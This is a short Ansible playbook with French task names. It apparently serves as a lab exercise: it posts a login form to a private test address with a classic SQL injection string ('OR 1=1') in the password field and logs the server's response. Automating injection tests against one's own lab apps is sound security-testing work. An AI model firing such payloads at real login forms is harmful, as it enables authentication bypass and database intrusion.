---
- name: Envoyer une requête POST avec Ansible
  hosts: localhost 
  gather_facts: no  

  tasks:
    - name: Envoyer la requête POST
      uri:
        url: "http://192.168.56.2:5000/form"
        method: POST 
        return_content: yes
        body_format: form-urlencoded  
        body: 
          email: hecker@kack.com
          password: toto' OR 1=1 OR 1='
        status_code: 200  
      register: result  

    - name: Rediriger la sortie vers un fichier de log
      copy:
        content: "{{ result }}"
        dest: logBDDinjection
